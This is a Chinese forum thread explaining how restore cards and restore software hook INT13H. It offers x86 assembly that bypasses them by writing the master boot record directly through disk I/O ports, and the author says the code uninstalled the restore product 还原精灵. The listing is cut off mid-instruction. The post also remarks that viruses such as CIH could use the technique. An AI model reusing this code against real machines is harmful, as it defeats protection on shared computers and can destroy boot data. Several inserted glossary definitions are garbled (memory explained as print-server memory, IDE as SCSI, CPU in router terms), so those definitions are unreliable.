可以穿透还原卡和还原软件的代码

xyz611

还原卡和还原软件被广泛运用于各种公共场合的[wiki]电[/wiki]脑上，比如学校机房和网吧。这些还原卡和还原软件（以下我简称为虚拟还原技术）能够记录下一切对硬盘的写操作，不论您对硬盘进行拷贝还是[wiki]移动[/wiki]删除甚至是格式化分区等操作，只要一重新启动，一切都会恢复到这个操作之前的情况，因此有些虚拟还原厂商还会在[wiki]广告[/wiki]词中加上一句“可以防范一切电脑[wiki]病毒[/wiki]”。这种虚拟还原的方法在大部分时候的确可以对公共机房的电脑起到很好的保护作用，难道真的没有一种方法能够穿透这种保护机制么？答案是否定的，下面请听我一一道来。

一、虚拟还原技术的原理
本文所说的是一种普遍运用于还原卡或还原软件上的技术，当然，不同品牌不同厂商生产的可能不尽相同，但原理却是相通的。
首先，还原卡和还原软件会抢先夺取引导权，将原来的0头0道1扇保存在一个其他的扇区，（具体备份到那个扇区是不一定的），将自己的[wiki]代码[/wiki]写入0头0道1扇，从而能在操作系统之前得到执行权，这一点类似于一个引导型病毒；然后，我们来看看虚拟还原技术在操作系统之前都做了些什么：
1．将中断向量表中的INT13H的入口地址保存；
2．把自己用于代替INT13H的代码写入[wiki]内存[/wiki]，并记住入口地址，当然这种“写入内存”并不是普通的“写”，而是一种我们称为“常驻”的方法，有关“常驻程序”的实现方法我们不另外[wiki]花[/wiki]篇幅来描述了，如果你还不了解的话请自己找有关资料，也可以到www.hackart.org或www.lsky.net找风般的男人[wiki]交流[/wiki]；
3．将中断向量表中INT13H的入口地址改为这段常驻程序的入口地址。补充一点，虚拟还原程序在修改INT13H的入口后往往都会修改一些其他中断入口，当然也是通过常驻程序来实现的，这些中断用来实现对中断向量表中INT13H入口地址监控，一旦发现被修改，就[wiki]马[/wiki]上把它改回，这样做同样是用来防止被有心人破解。
好了，你已经看出来了，这段用来替代BIOS提供的INT13H的代码才是虚拟还原技术的关键，那么这段代码到底实现了些什么了，以下是本人对此拙浅的理解：
1．拦截所有INT13H中对硬盘0头0道1扇的操作
这些包括读写操作，把所有的对0头0道1扇的操作改为对虚拟还原程序备份的那个扇区的操作，这样做的目的是保护虚拟还原代码不被破坏，并且不能被有心人读出进行破解，即使你用扇区编辑[wiki]工具[/wiki]查看主引导区，实际上你看到的是这个备份的主引导区。
2．拦截所有INT13H中的写硬盘操作
这里包括对8G以下的硬盘的普通通过磁头、磁道、扇区定位的INT13H中的写操作，和扩展INT13H中基于扇区地址方式的对大硬盘的写操作，甚至包括扩展INT13H中对一些非IDE接口的硬盘的写操作。
至于拦截后做什么是虚拟还原技术实现的关键，在早期的DOS系统当中完全可以“什么都不做”，也就是说当用户写硬盘时实际上是什么都没做，但现在的操作系统都要对硬盘进行一些必要的写操作，比如对虚拟内存的写操作。众所周知，虚拟内存实际上就是硬盘，而如果禁止操作系统写硬盘的话显然后果是不堪设想的。所以，大多数虚拟还原厂商用的方法是占用一些硬盘空间，把硬盘所进行的写操作做一个记录，等系统重新启动后还原这一记录，但是怎样科学记录硬盘的写操作，是我一直没想通的问题，这种“科学”应该体现在时间上和硬盘空间的占用量上的，也就是说怎么样用最少的时间和最少的硬盘空间来记录硬盘的写操作是实现关键，如果有这方面想法的朋友欢迎和我交流；
3．备份端口70H，71H中的内容，并把最后一次执行时端口70H，71H的内容和备份的内容做比较，不一样就提示BIOS被修改，是否还原，并通过密码验证修改BIOS是否合法。

文中的一些名字解释：
扇区（Sector），为磁道的一部分，将每个磁道分成几个小区域，此区域即为扇区，在DOS下每个扇区可存放512字节的数据。

中断，是指在计算机执行期间，系统内发生任何非寻常的或非预期的急需处理事件，使得CPU暂时中断当前正在执行的程序而转去执行相应的时间处理程序。待处理完毕后又返回原来被中断处继续执行或调度新的进程执行的过程。

内存，打印服务器的内存大小决定了打印服务器可以支持的最大列队数目。内存越大，支持的越多，反之越少。

BIOS（基本输入输出系统）是PC中不可或缺的组成部分，是在计算机开机后微处理器启动计算机使用的一种程序。它还负责管理计算机操作系统与外设之间的数据传输。

　磁头（Head），又称读写头，为读写磁道数据的装置，盘片有上下两面，故有上下磁头，软盘的读写头与盘片相接触，故磁头脏了就容易把软盘刮伤，而造成盘片的损坏。

磁道（Track），为盘片存放数据的同心圆轨道。

IDE接口，　当今主流的SCSI硬盘接口主要有Ultra 160 SCSI、Ultra 320 SCSI和[wiki]光[/wiki]纤接口。Ultra 160 SCSI的外部传输率为160MB/S，Ultra 320 SCSI的外部传输率为320MB/S，光纤接口的外部传输率为200MB/S。

xyz611

二、PC机的中断机制
中断提供了最基本的硬件和软件的接口，它使得程序员不必了解硬件系统的细节，只要直接调用系统提供的中断服务子程序，就可以完成相应功能，这样能使得程序设计更为方便。其实现机制如下：当某一中断源发出中断请求时，CPU能够决定是否响应这一中断请求（当CPU在执行更为重要的工作时，可以暂不响应），如果允许响应该中断，CPU会在现行的指令执行完后，把断点处的下一条指令地址和各寄存器的内容和标志位的状态，推入堆栈进行保护，然后转到中断源服务程序的入口，进行中断处理，当中断处理完成后，再恢复被保留的各寄存器、标志位状态和指令指针，使CPU返回断点，继续执行下一条指令。
为了区别各个中断，CPC系统给每个中断都分配了一个中断号N，比如INT 3H是断点中断，INT 10H是显示中断，我们今天要讨论的主要是INT 13H磁盘读写中断。
要说清楚PC机上的中断机制，用这一点篇幅是完全不够的，这里我所说的只是一个大概，如果你不清楚的话，请查阅一些资料或和我交流，我们今天重要要说的就是以INT13H为例看看BIOS提供给我们的中断到底都是在做什么？所谓BIOS中断简单说就是你机器上的BIOS提供的中断，那么在BIOS中断的后面，到底是些什么呢？实际上是一些对端口的输入输出操作，PC的每个端口都实现特定的功能，我们完全可以不调用BIOS提供的中断而直接用输入输出指令对这些端口进行操作，从而可以实现[wiki]象[/wiki]调用BIOS中断一样的功能，但是一个前提是你必须对这些端口有详细的了解。反过来说，PC的中断系统的一大好处就是能够让程序员无须了解系统底层的硬件知识的而能够编程，从这点看，中断有点象我们平时所说的“封装”，我不知道这样说对不对，但的确中断为我们“封装”了许多系统底层的细节。

名词解释：

中断，是指在计算机执行期间，系统内发生任何非寻常的或非预期的急需处理事件，使得CPU暂时中断当前正在执行的程序而转去执行相应的时间处理程序。待处理完毕后又返回原来被中断处继续执行或调度新的进程执行的过程。

接口，　当今主流的SCSI硬盘接口主要有Ultra 160 SCSI、Ultra 320 SCSI和光纤接口。Ultra 160 SCSI的外部传输率为160MB/S，Ultra 320 SCSI的外部传输率为320MB/S，光纤接口的外部传输率为200MB/S。

CPU，　无论在中低端路由器还是在高端路由器中，CPU都是路由器的心脏。通常在中低端路由器中，CPU负责交换路由信息、路由表查找以及转发数据包。在上述路由器中，CPU的能力直接影响路由器的吞吐量（路由表查找时间）和路由计算能力（影响网络路由收敛时间）。在高端路由器中，通常包转发和查表由ASIC芯片完成，CPU只实现路由协议、计算路由以及分发路由表。由于技术的发展，路由器中许多工作都可以由硬件实现（专用芯片）。CPU性能并不完全反映路由器性能。路由器性能由路由器吞吐量、时延和路由计算能力等指标体现。

BIOS，　BIOS（基本输入输出系统）是PC中不可或缺的组成部分，是在计算机开机后微处理器启动计算机使用的一种程序。它还负责管理计算机操作系统与外设之间的数据传输。

xyz611

硬盘读写端口的具体含义

对硬盘进行操作的常用端口是1f0h~1f7h号端口，各端口含义如下：
端口号 读还是写 具体含义
1F0H 读/写 用来传送读/写的数据(其内容是正在传输的一个字节的数据)
1F1H 读 用来读取错误码
1F2H 读/写 用来放入要读写的扇区数量
1F3H 读/写 用来放入要读写的扇区号码
1F4H 读/写 用来存放读写柱面的低8位字节
1F5H 读/写 用来存放读写柱面的高2位字节(其高6位恒为0)
1F6H 读/写 用来存放要读/写的磁盘号及磁头号
第7位 恒为1
第6位 恒为0
第5位 恒为1
第4位 为0代表第一块硬盘、为1代表第二块硬盘
第3~0位 用来存放要读/写的磁头号
1f7H 读 用来存放读操作后的状态
第7位 控制器忙碌
第6位 磁盘驱动器准备好了
第5位 写入错误
第4位 搜索完成
第3位 为1时扇区缓冲区没有准备好
第2位 是否正确读取磁盘数据
第1位 磁盘每转一周将此位设为1,
第0位 之前的命令因发生错误而结束
写 该位端口为命令端口,用来发出指定命令
为50h 格式化磁道
为20h 尝试读取扇区
为21h 无须验证扇区是否准备好而直接读扇区
为22h 尝试读取长扇区(用于早期的硬盘,每扇可能不是512字节,而是128字节到1024之间的值)
为23h 无须验证扇区是否准备好而直接读长扇区
为30h 尝试写扇区
为31h 无须验证扇区是否准备好而直接写扇区
为32h 尝试写长扇区
为33h 无须验证扇区是否准备好而直接写长扇区
注:当然看完这个表你会发现，这种读写端口的方法其实是基于磁头、柱面、扇区的硬盘读写方法，不过大于8G的硬盘的读写方法也是通过端口1F0H~1F7H来实现的^_^

• 名词解释

  字节，通常将可表示常用英文字符8位二进制称为一字节。
  
  　扇区（Sector），为磁道的一部分，将每个磁道分成几个小区域，此区域即为扇区，在DOS下每个扇区可存放512字节的数据。
  
  　磁头（Head），又称读写头，为读写磁道数据的装置，盘片有上下两面，故有上下磁头，软盘的读写头与盘片相接触，故磁头脏了就容易把软盘刮伤，而造成盘片的损坏。
  
  　磁道（Track），为盘片存放数据的同心圆轨道。

Genet

太专业，看不懂，嘿嘿

xyz611

一个通过对硬盘输入输出端口操作来读写硬盘的实例

四、一个通过对硬盘输入输出端口操作来读写硬盘的实例
让我们来看一个关于INT13H读写硬盘程序实例。在例子中详细说明了硬盘的读写操作所用到的端口，并且把通过INT13H读出的主引导区得到的数据和通过输入输出读主引导区得到的数据进行比较，从而证实这两种操作功能相同，程序片段如下：

mov dx,1f6h ; 要读入的磁盘号及磁头号
mov al,0a0h ;磁盘0,磁头0
out dx,al

mov dx,1f2h ;要读入的扇区数量
mov al,1 ;读一个扇区
out dx,al

mov dx,1f3h ;要读的扇区号
mov al,1 ;扇区号为1
out dx,al

mov dx,1f4h ;要读的柱面的低8位
mov al,0 ; 柱面低8位为0
out dx,al

mov dx,1f5h ; 柱面高2位
mov al,0 ; 柱面高2位为0（通过1F4H和1F5H端口我们可以确定
; 用来读的柱面号是0）
out dx,al

mov dx,1f7h ;命令端口
mov al,20h ; 尝试读取扇区
out dx,al
still_going:
in al,dx
test al,8 ;扇区缓冲是否准备好
jz still_going ;如果扇区缓冲没有准备好的话则跳转，直到准备好才向下执行。

mov cx,512/2 ;设置循环次数（512/2次）
mov di,offset buffer
mov dx,1f0h ;将要传输的一个字节的数据
rep insw ;传输数据

; ------

mov ax,201h ;以下是用INT13H读硬盘的0磁头、0柱面、1扇区
mov dx,80h
mov cx,1
mov bx,offset buffer2
int 13h

mov cx,512 ;以下部分用来比较2种方法读出的硬盘数据
mov si,offset buffer
mov di,offset buffer2
repe cmpsb
jne failure
mov ah,9
mov dx,offset readmsg
int 21h
jmp good_exit
failure:
mov ah,9
mov dx,offset failmsg
int 21h
good_exit: ;以下部分用来结束程序
mov ax,4c00h ;退出程序
int 21h

readmsg db 'The buffers match. Hard disk read using ports.$'
failmsg db 'The buffers do not match.$'
buffer db 512 dup ('V')
buffer2 db 512 dup ('L')

五、可以穿透还原卡或是还原软件保护的代码

五、可以穿透还原卡或是还原软件保护的代码
你可以对照硬盘读写端口含义表,再好好看看上面的例子,你将会对硬盘读写端口有一个比较深的理解。好了，到了该把谜底揭晓的时候了，重新回到我们的主题。正如你现在想象的，这种可以穿透还原卡或是还原软件保护的代码的确是对硬盘读写端口的输入输出操作。现在，我们已经可以从原理上理解了，还原卡拦截的是中断操作，但却拦截不了输入输出操作，而用输入输出操作足够可以对硬盘进行写操作了，当然用输入输出操作也完全可以读到被虚拟还原程序屏蔽的关键部分，被还原卡或是还原软件屏蔽的0头0道1扇。知道了这一原理以后，可能是仁者见仁智者见智的，如果你是一个虚拟还原技术的破解者、一个病毒制造者，或是虚拟还原技术的设计者，往往对此的理解都是不尽相同的。
在此强调我不赞成制造病毒，但一个病毒制造者完全可以用此原理写出一个可以实现破坏装有还原卡或还原软件的机器了，所以我要提醒虚拟还原用户的是，不要以为装有还原卡或是还原软件就掉以轻心，要知道世界上还是有病毒能够穿透虚拟还原技术的保护，达到破坏硬盘的目的的，想象一下如果把这一原理运用到CIH病毒中，或者运用到硬盘杀手病毒中，其后果是不堪设想的。
谈谈如何用这种可以穿透虚拟还原技术的代码来破解还原软件（如还原精灵）吧。以下是我写的用来测试破解还原精灵的代码，本代码编译后的程序需要在纯DOS环境执行，在DOS下我用这段代码成功的把还原精灵给卸载了。
.286
CODE SEGMENT
ASSUME CS:CODE,DS:code,ES:code
START:
;----------------------------------------------------------
;以下代码用INT13H读主引导区
mov ax,0201h
mov dx,0080h
mov cx,0001h
mov bx,7c00h
int 13h
;---------------------------------------------------------
;以下代码用I/O端口来写主引导区
mov dx,1f6h ; 要读入的磁盘号及磁头号
mov al,0a0h ; 磁盘0,磁头0
out dx,al

mov dx,1f2h ; 要写的扇区数量
mov al,1 ; 写一个扇区
out dx,al

mov dx,1f3h ;要写的扇区号
mov al,1 ;写到1扇区
out dx,al

mov dx,1f4h ; 要写的柱面的低8位
mov al,0 ; 低8位为0
out dx,al

mov dx,1f5h ; 要写的柱面的高2位
mov al,0 ; 高2位为0
out dx,al

mov dx,1f7h ;命令端口
mov al,30h ;尝试着写扇区.
out dx,al
oogle:
in al

二手本本

发个代码

我们看一看呀

YY

真专业...网上很多软件可以的吧?